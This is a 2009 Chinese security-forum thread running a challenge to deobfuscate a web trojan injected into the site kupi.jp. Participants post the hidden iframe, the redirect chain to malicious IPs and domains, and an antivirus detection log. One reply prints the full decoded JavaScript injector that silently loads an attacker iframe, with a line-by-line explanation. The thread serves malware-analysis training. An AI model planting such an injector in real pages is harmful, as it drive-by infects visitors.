[第28期]kupi.jp[完成]

显示全部楼层 · 发表于 2009-3-18 22:19:33

宗旨：
让更多人了解如何解密网马
规则：
1、Hunter不能参加活动
2、必须把所有木马地址全部解出，不完全解密且所发URL之前没有人解出者得到相应步骤加分
3、最好有解密软件日志，如果没有，请发出具体解密过程
4、如果有违反1~2条规则的情况，本帖随即锁定，之后成功解密的作废！
5、锁定后，会重新修改本次的解密地址，并且开帖！
6、为了体现悬赏帖宗旨，昨日解密成功者再次解出今天网址的只能得到对应网址70%经验

解密地址（替换HXXP为HTTP）：

hxxp://www.kupi.jp
一次解完（包含解密步骤）=22分
分步（即未解完情况）：5+4+3+3

注意：这些地址含有恶意软件，可能会危害到您的计算机。请不要直接打开，否则因此造成的一切后果我们概不负责！
参考解密工具：
FreShow（英文）、 Redoce 1.9（中文）、malzilla （英文，但是乃神器也）
http://glacierlk.cn/openlab/jm.htm
参考解密教程：
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550
http://bbs.kafan.cn/thread-408295-1-1.html

(时限=1天)

显示全部楼层 · 发表于 2009-3-19 13:37:13

打开首页获得

<IFRAME src="http://www.kupi.jp.30ec3a1fd7620743.longebook.cn/qq.cn/">

打开上面的网址跳转到

http://193.138.172.15/salo/?t=6

解密获得（后面的地址是随机的，每次都不一样）

http://193.138.172.15/salo/??3dcdb61062c531129c371e1f7bbedcf4ef7ee33cb6e0a119c52de89213352f6e21133ec478b926be5b402444a15a7e9e08c2747924e0d00e1f6fc79f9e1bc4ea

内容当然每次也都不一样，但是没法解密，用E>XXTEA解密(参数)解密，软件直接崩溃退出了。

显示全部楼层 · 发表于 2009-3-19 14:53:47

跳转到这里这下不去了

http://61.131.89.152/req.php?str1=212374296670541215&t=05412296220010244599731237429667&str2=http://lousecn.cn/
http://lousecn.cn/

显示全部楼层 · 发表于 2009-3-19 15:54:26

http://193.138.172.15/salo/?19df8ec82856d6e7754110bb6d34cd71a1f4249275f0475330621e8ae1395519a06a734bd70b02c6435aa3f8f6b69c6053cadbe405917615b82fa8aeca226b97
没想到这个就是地址?

显示全部楼层 · 发表于 2009-3-20 12:38:11

http://www.kupi.jp.30ec3a1fd7620743.longebook.cn/qq.cn/
怎么解出来的呢？我只解出qq.cn/。
高手详细的说下解密过程吧！

显示全部楼层 · 发表于 2009-3-20 12:40:14

2009-3-20 12:39:44 检测到威胁: Trojan-Downloader.Win32.Obfuscated.pts C:\Documents and Settings\Administrator\桌面\样本.rar/样本.exe
2009-3-20 12:39:44 已删除: Trojan-Downloader.Win32.Obfuscated.pts C:\Documents and Settings\Administrator\桌面\样本.rar/样本.exe

显示全部楼层 · 发表于 2009-3-20 17:07:21

function McjZFDCzlxb(){};

McjZFDCzlxb.prototype = {
  getFrameURL : function (){
var dlh = document.location.host;
return "http" + '://' + ((dlh == '' || dlh == 'undefined') ? this .getRandString() :
'') + dlh.replace(/[^a-z0-9.-]/, '.').replace(/\.+/, '.') + "." + this .getRandString
() + "." + this .path + this .host;
  }
  , setCookie : function (name, value){
var d = new Date();
d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
  }
  , cookieName : 'cdeahgbf', cookieValue : 1, install : function (){
if (!this .alreadyInstalled()){
   var s =
   "<xdxixv3 3s^tCy^lCex=C\'CdJiJsxpxlCa^yx:CnCo^nxeC\'^>J<^iCfCrCaJm^e3 CsxrxcC=3\'^".
   replace(/[3J\^Cx]/g, '') + this .getFrameURL() +
   "\'z>z<z/(i0f(r(a0mMe,>0<,/,d0iMv(>(".replace(/[\(M,0z]/g, '');
   try {
      var o = document;
      o.open();
      o.write(s);
      o.close();
   }
   catch (e){
      document.write('<UhwtUm{l{>9<UbUoUdwy9>w'.replace(/[Uw\{79]/g, '') + s +
      '<V/RbRoRd!yX>V<!/XhVtXmXlX>g'.replace(/[Vg\!RX]/g, ''))
   }
   this .setCookie(this .cookieName, this .cookieValue);
}
  }
  , path : "l" + "o" + "n" + String.fromCharCode(103) + "e" + new String("b") + String.
  fromCharCode(111) + "o" + String.fromCharCode(107) + new String(".") + String.
  fromCharCode(99) + "n", getRandString : function (){
var l = 16, c = '0@1>2:3>4>5>6R7%8@9@a@b%c@dRe%f:'.replace(/[R\:@\>%]/g, ''), o = '';
for (var i = 0; i < l; i ++ )o += c.substr(Math.floor(Math.random() * c.length), 1, 1
);
return o;
  }
  , host : '/qq.cn/', alreadyInstalled : function (){
return !(document.cookie.indexOf(this .cookieName + '=' + this .cookieValue) ==  - 1
);
  }
}
;
var ocho = new McjZFDCzlxb();
ocho.install();

var dlh = document.location.host;
return "http" + '://' + ((dlh == '' || dlh == 'undefined') ? this .getRandString() :
'') + dlh.replace(/[^a-z0-9.-]/, '.').replace(/\.+/, '.') + "." + this .getRandString
() + "." + this .path + this .host;

/* dlh=document.location.host;
         即dlh="www.kupi.jp";
         ((dlh == '' || dlh == 'undefined') ? this .getRandString() : '')
         即dlh=空或者未定义时返回随机字符，否则返回空（此处返回空）
         再连上dlh有效字母数字的数据
         然后连上一个"."
         连上随机字符.this.path+this.host
         path : "l" + "o" + "n" + String.fromCharCode(103) + "e" + new String("b") + String.
         fromCharCode(111) + "o" + String.fromCharCode(107) + new String(".") + String.
         fromCharCode(99) + "n"
         (即longebook.cn)
         host : '/qq.cn/'
         连上即www.kupi.jp.[随机字符].longebook.cn/qq.cn/
         之后调用函数把iframe写入文档，ie会自动加载 */

大概就这样了

显示全部楼层 · 发表于 2009-3-22 11:30:17

原来如此啊。

[其它] [第28期]kupi.jp[完成]

评分

回复 2楼 250662772 的帖子

回复 4楼 250662772 的帖子

回复 5楼 nanhezzb 的帖子

评分

回复 7楼 qianwenxiang 的帖子